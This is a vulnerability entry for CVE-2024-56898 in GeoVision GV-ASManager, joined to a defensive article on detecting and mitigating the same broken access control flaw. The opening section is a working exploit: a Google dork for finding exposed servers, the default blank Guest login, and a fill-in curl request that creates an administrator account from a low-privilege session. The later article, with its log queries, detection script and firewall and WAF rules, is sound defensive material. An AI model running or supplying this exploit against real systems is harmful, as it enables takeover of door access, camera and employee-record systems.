GeoVision GV-ASManager 6.1.0.0 - Broken Access Control
# Exploit Title: Broken Access Control in GeoVision GV-ASManager
# Google Dork: inurl:"ASWeb/Login"
# Date: 02-FEB-2025
# Exploit Author: Giorgi Dograshvili [DRAGOWN]
# Vendor Homepage: https://www.geovision.com.tw/
# Software Link: https://www.geovision.com.tw/download/product/
# Version: 6.1.0.0 or less
# Tested on: Windows 10 | Kali Linux
# CVE : CVE-2024-56898
# PoC: https://github.com/DRAGOWN/CVE-2024-56898
A broken access control vulnerability exists in the GeoVision GV-ASManager web application, version 6.1.0.0 or less.
Requirements
To perform a successful attack, an attacker requires:
- GeoVision GV-ASManager version 6.1.0.0 or less
- Network access to the GV-ASManager web application (in some deployments it is publicly accessible)
- Access to the Guest account (enabled by default; Username: Guest, Password: <blank>) or any other low-privilege account
Impact
The vulnerability can be leveraged to perform the following unauthorized actions. A low-privilege account that is not authorized to manage accounts is able to:
- Enable and disable any account.
- Create new accounts.
- Modify the privileges of any account.
- List accounts and their information.
After escalating privileges, an attacker is able to:
- Access resources such as monitoring cameras, access cards, parking vehicles, employees and visitors, etc.
- Make changes to data and service network configurations such as employees, access card security information, IP addresses and configurations, etc.
- Disrupt and disconnect services such as monitoring cameras and access controls.
- Clone and duplicate access control data for further attack scenarios.
- Perform the CVE-2024-56902 attack to retrieve cleartext passwords that can be reused against other digital assets of the organization.
cURL script:
curl --path-as-is -i -s -k -X $'POST' \
-H $'Host: [SET-TARGET]' -H $'Sec-Ch-Ua: \"Not?A_Brand\";v=\"99\", \"Chromium\";v=\"130\"' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H $'Accept-Language: en-US,en;q=0.9' -H $'Upgrade-Insecure-Requests: 1' -H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' -H $'Sec-Fetch-Site: cross-site' -H $'Sec-Fetch-Mode: navigate' -H $'Sec-Fetch-Dest: document' -H $'Accept-Encoding: gzip, deflate, br' -H $'Priority: u=0, i' -H $'Connection: keep-alive' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 111' \
-b $'[SET-COOKIE - WRITE WHAT IS AFTER "Cookie:"]' \
--data-binary $'action=UA_SetCreateAccount&id=[SET-USERNAME]&password=[SET-PASSWORD]&email=[SET-MAIL]&level=[SET-PRIVILEGE 1-STANDARD USER/2-ADMINISTRATOR]' \
$'[SET-TARGET]/ASWeb/bin/ASWebCommon.srf'
After a successful attack, you will get access to:
- ASWeb- Access & Security Management
- TAWeb- Time and Attendance Management
- VMWeb- Visitor Management
- ASManager - Access & Security Management software in OS
GeoVision GV-ASManager 6.1.0.0 - Broken Access Control (CVE-2024-56898)
This article explains the broken access-control vulnerability tracked as CVE-2024-56898 in GeoVision GV‑ASManager (v6.1.0.0 and earlier). It focuses on what the vulnerability is, the potential impact, safe detection and monitoring techniques, and practical, defensive mitigations you can apply to protect devices and networks. The guidance below is written for defenders and system owners; it avoids exploit details and instead emphasizes remediation and incident response.
Summary
GV‑ASManager is an Access & Security Management platform used for controlling doors, visitor management, time & attendance, and integrated video monitoring. CVE‑2024‑56898 is a server-side broken access-control issue where a low‑privilege account (for example, a default or guest account) can perform account-management actions that should be restricted to administrators. Exploitation requires network access to the web interface and access to a low‑privilege account (guest accounts are often enabled by default).
Why this is critical
- Broken access control allows privilege escalation from low‑privilege accounts to administrator-level control without proper authorization checks.
- Successful compromise can expose or alter sensitive security systems (monitoring cameras, access cards, parking, employee records) and disrupt operations.
- Attackers can create accounts, change privileges, and persist within the environment — enabling broader lateral movement and fraud.
High-level technical nature (non-actionable)
At a high level, this vulnerability is the result of insufficient server-side authorization checks on account-management functionality. The server accepts requests from authenticated low‑privilege sessions and performs privileged actions without verifying whether the caller has administrative rights. The result is that accounts and privileges can be listed or manipulated from unprivileged sessions.
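To make the missing check concrete, here is an added illustrative model (not GV-ASManager code) of a request dispatcher with and without server-side authorization. The action name UA_SetCreateAccount and the privilege levels 1 (standard user) and 2 (administrator) come from the advisory above; the session structure, the ViewOwnProfile action and the handler bodies are assumed for illustration.

```python
# Illustrative model only; not the product's code. Levels follow the advisory:
# 1 = standard user, 2 = administrator.
STANDARD_USER, ADMINISTRATOR = 1, 2


class Forbidden(Exception):
    """Raised when a request fails the authorization check."""


# Deny-by-default policy: each action lists the minimum session level that may
# call it; an action that is not listed is refused outright.
REQUIRED_LEVEL = {
    "UA_SetCreateAccount": ADMINISTRATOR,   # account management: admins only
    "ViewOwnProfile": STANDARD_USER,        # hypothetical low-privilege action
}


def create_account(accounts, params):
    # The request's own 'level' is the privilege of the account being created;
    # it must never be used as evidence of the caller's privilege.
    accounts[params["id"]] = {"level": int(params["level"]), "email": params.get("email", "")}
    return "created"


HANDLERS = {
    "UA_SetCreateAccount": create_account,
    "ViewOwnProfile": lambda accounts, params: "profile",
}


def dispatch_flawed(session, action, params, accounts):
    """Models the flaw: any authenticated session reaches the handler."""
    if session is None:
        raise Forbidden("login required")
    return HANDLERS[action](accounts, params)


def dispatch_fixed(session, action, params, accounts):
    """Authorization decided from the server-side session level, not the request."""
    if session is None:
        raise Forbidden("login required")
    needed = REQUIRED_LEVEL.get(action)
    if needed is None:
        raise Forbidden(f"unknown action {action!r}")
    if session["level"] < needed:
        raise Forbidden(f"{session['user']} is not permitted to call {action}")
    return HANDLERS[action](accounts, params)


def attempt(dispatch, session, action, params, accounts):
    """Demo helper: return the handler result, or 'forbidden' if the check rejects it."""
    try:
        return dispatch(session, action, params, accounts)
    except Forbidden:
        return "forbidden"
```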
Potential impacts and attack scenarios
- Unauthorized creation of administrative accounts or elevation of existing accounts.
- Disabling legitimate accounts to lock out administrators.
- Access to monitoring camera feeds, visitor logs, and employee data.
- Tampering with access control data (card numbers, door schedules) enabling physical intrusion.
- Persistence and lateral movement inside a secure environment, possibly tying in with other vulnerabilities to extract cleartext secrets.
Detection and risk assessment (safe methods)
1) Inventory and exposure assessment
- Identify all deployed instances of GV‑ASManager in your network. Use asset inventory and network discovery tools in read‑only or authenticated scan mode.
- Check whether web management interfaces are reachable from the internet. If the interface is intended to be internal only, verify firewall/NAT rules and cloud security groups to reduce exposure.
2) Verify default/guest accounts and credentials
Confirm whether the Guest or any default low‑privilege accounts are enabled and whether they have weak or blank credentials. This is a valid, low‑risk check for administrators and should be performed via the product’s management UI or documented configuration procedures — not via aggressive probing from external networks.
3) Log and event detection
Monitor for indicators of unauthorized account modification, including sudden account creation, privilege changes, or unexpected administrative activity from non‑admin accounts. Use centralized logging to capture web server access logs and application logs for forensic inspection.
# Example (Splunk) conceptual query to find POST activity to ASManager web paths in the last 30 days
index=network_logs source=web_access earliest=-30d
| where like(uri_path, "%/ASWeb/%") AND method="POST"
| stats count by src_ip, user, uri_path, http_status
The query above is a defensive example to surface POST requests to ASManager‑related paths. Adjust the index and fields for your logging environment. The goal is to flag unusual POST activity, especially from accounts that should not be performing administrative actions.
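As an added detection example that is not part of the original article, the following Python script applies the same idea as the query above to raw log lines: it flags POST requests to the ASWebCommon.srf endpoint from accounts outside an assumed administrator list, and escalates when the body carries a UA_SetCreateAccount with level=2 (a new administrator). The sample lines and their format (combined log fields followed by a request body captured by a reverse proxy, with passwords masked) are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed sample lines, not real product logs. The final quoted field is the
# request body as a hypothetical reverse proxy would capture it; password values
# are masked before storage, which any such capture must do.
SAMPLE_LOGS = """\
10.0.0.5 - admin [02/Feb/2025:10:01:12 +0000] "POST /ASWeb/bin/ASWebCommon.srf HTTP/1.1" 200 512 "action=UA_SetCreateAccount&id=ops2&password=MASKED&email=ops2%40example.test&level=1"
192.168.1.20 - Guest [02/Feb/2025:10:03:44 +0000] "POST /ASWeb/bin/ASWebCommon.srf HTTP/1.1" 200 512 "action=UA_SetCreateAccount&id=backdoor&password=MASKED&email=x%40example.test&level=2"
192.168.1.20 - Guest [02/Feb/2025:10:04:01 +0000] "GET /ASWeb/Login HTTP/1.1" 200 2048 "-"
10.0.0.7 - Guest [02/Feb/2025:10:05:30 +0000] "POST /ASWeb/bin/ASWebCommon.srf HTTP/1.1" 200 512 "action=UA_SetCreateAccount&id=ops3&password=MASKED&email=ops3%40example.test&level=1"
10.0.0.7 - Guest [02/Feb/2025:10:06:02 +0000] "POST /ASWeb/bin/ASWebCommon.srf HTTP/1.1" 200 300 "-"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) - (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \d+ "(?P<body>[^"]*)"$'
)
MGMT_PATH = "/ASWeb/bin/ASWebCommon.srf"   # endpoint named in the advisory
ADMIN_USERS = {"admin"}                     # assumption: accounts expected to manage accounts


def analyze(log_text, admin_users=ADMIN_USERS):
    """Return (severity, src_ip, user, action, target_id) for each suspicious line."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["method"] != "POST" or m["path"] != MGMT_PATH:
            continue
        if m["user"] in admin_users:
            continue  # expected administrative activity; still audit it separately
        params = {k: v[0] for k, v in parse_qs(m["body"]).items()}
        action = params.get("action", "")
        if action == "UA_SetCreateAccount":
            # Any account creation by a non-admin is the flaw in action;
            # level=2 means the created account is an administrator.
            sev = "HIGH" if params.get("level") == "2" else "MEDIUM"
            findings.append((sev, m["src"], m["user"], action, params.get("id", "")))
        else:
            # Body not captured or unknown action: still a non-admin POST to the endpoint.
            findings.append(("LOW", m["src"], m["user"], action or "<unparsed>", ""))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOGS):
        print(*finding)
```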
Mitigation and remediation (recommended)
1) Apply vendor fixes
- Check GeoVision support channels and apply the latest security updates/patches immediately. Vendor patches are the primary remediation for a server‑side authorization flaw.
- If a formal patch is not yet available, follow vendor guidance and temporary mitigations issued by GeoVision.
2) Disable or harden default/guest accounts
- Disable the Guest/default accounts if they are not required.
- Enforce strong passwords and avoid blank passwords for any account.
- Use unique credentials per instance and rotate administrative passwords regularly.
3) Restrict network access to management interfaces
Limit access to web administration interfaces to trusted management networks and jump hosts only. Use IP allowlists for management traffic and block public access to admin endpoints.
# NGINX configuration snippet (defensive) to restrict management path to internal networks
location ^~ /ASWeb/ {
    allow 10.0.0.0/8;
    allow 192.168.0.0/16;
    deny all;
}
This NGINX snippet prevents access to the /ASWeb/ path from outside the allowed subnets. Adjust CIDR blocks to match your management network range. Deploying such rules on perimeter/web-proxy devices reduces internet exposure.
# Windows PowerShell example to allow only a management subnet to reach HTTP(S) on a server
# Windows Defender Firewall has no rule ordering: an explicit Block rule always wins over an
# Allow rule, so a Block rule with -RemoteAddress Any would also block the management subnet.
# Instead, make the profile's default inbound action Block and add only the Allow rule.
Set-NetFirewallProfile -Profile Domain,Private,Public -DefaultInboundAction Block
# Allow management subnet
New-NetFirewallRule -DisplayName "Allow ASManager ManagementSubnet" `
    -Direction Inbound -Protocol TCP -LocalPort 80,443 `
    -RemoteAddress 10.0.0.0/24 -Action Allow
These commands are defensive examples. Because Block rules take precedence over Allow rules regardless of creation order, check that no other existing Allow rule for ports 80/443 (for example a generic web-server rule) reopens access, and verify that legitimate management access is not blocked accidentally.
4) Web Application Firewall (WAF) and access controls
- Configure WAF rules to require valid session cookies or block management‑oriented POST requests coming from untrusted networks.
- Rate‑limit and fingerprint suspicious traffic patterns to administrative endpoints.
# Conceptual ModSecurity rule (example; adapt for your environment)
# A chain matches only if every rule in it matches; the disruptive action and the
# mandatory id/phase belong on the first rule, and @ipMatch takes a comma-separated list.
SecRule REQUEST_METHOD "@streq POST" "id:100001,phase:1,deny,status:403,log,msg:'Block suspicious admin POST from external',chain"
    SecRule REQUEST_URI "@beginsWith /ASWeb/" "chain"
        SecRule REMOTE_ADDR "!@ipMatch 10.0.0.0/8,192.168.0.0/16"
The ModSecurity example denies POSTs to management URIs originating outside trusted subnets. Tailor the rule to match your deployment and test in monitoring mode before enforcing.
5) Principle of least privilege and authentication hardening
- Ensure administrative functions are accessible only to accounts that require them.
- Enable multi‑factor authentication (MFA) for privileged accounts where supported.
- Audit role assignments and remove unnecessary privileges.
Monitoring and detection best practices
- Collect and retain web access logs, application logs, and security events from GV‑ASManager for at least 90 days (or per your policy).
- Create alerting rules for: account creations, privilege escalations, account disables, and administrative logins from new hosts or unusual geolocations.
- Correlate application events with network flows to detect lateral movement or exfiltration attempts.
Incident response checklist
- Isolate the affected host from the network or restrict access to management subnet immediately.
- Collect forensic artifacts: application logs, system event logs, web server logs, and a memory snapshot if practical.
- Rotate all credentials that could have been compromised, including service accounts, administrator accounts, and integration credentials.
- Inspect system configuration for unauthorized changes (new admin accounts, modified privileges, network changes).
- Restore to a known-good state from trusted backups when necessary and validate integrity before re‑exposure.
- Engage GeoVision support for vendor advisories and follow their remediation guidance.
Compliance, risk prioritization, and long‑term strategies
Prioritize remediation according to exposure and business impact: internet‑facing management interfaces and installations in high‑security facilities should be patched or mitigated first. Consider network segmentation, dedicated management VLANs, centralized authentication (e.g., RADIUS, SAML where supported), and regular security assessments for physical access control systems that integrate with IT infrastructure.
Patch status table (example)
| Affected version | Risk | Recommended action |
|---|---|---|
| GV‑ASManager v6.1.0.0 or earlier | High | Apply vendor patch or mitigations; restrict network access; disable guest/default accounts |
| Patched versions (vendor-supplied) | Lower (after patch) | Verify patch applied, monitor logs, rotate credentials |
Responsible disclosure and staying informed
- Subscribe to GeoVision security advisories and CVE feeds to receive official patch and mitigation information.
- Coordinate with your vendor support channel for guidance tailored to your deployment and to validate remediation.
Final notes
Broken access control in security management systems is particularly dangerous because it can directly affect physical security controls and monitoring systems. Rapidly apply vendor patches, reduce exposure of management interfaces, enforce strong authentication, and maintain continuous monitoring to reduce the attack surface and detect abuse early.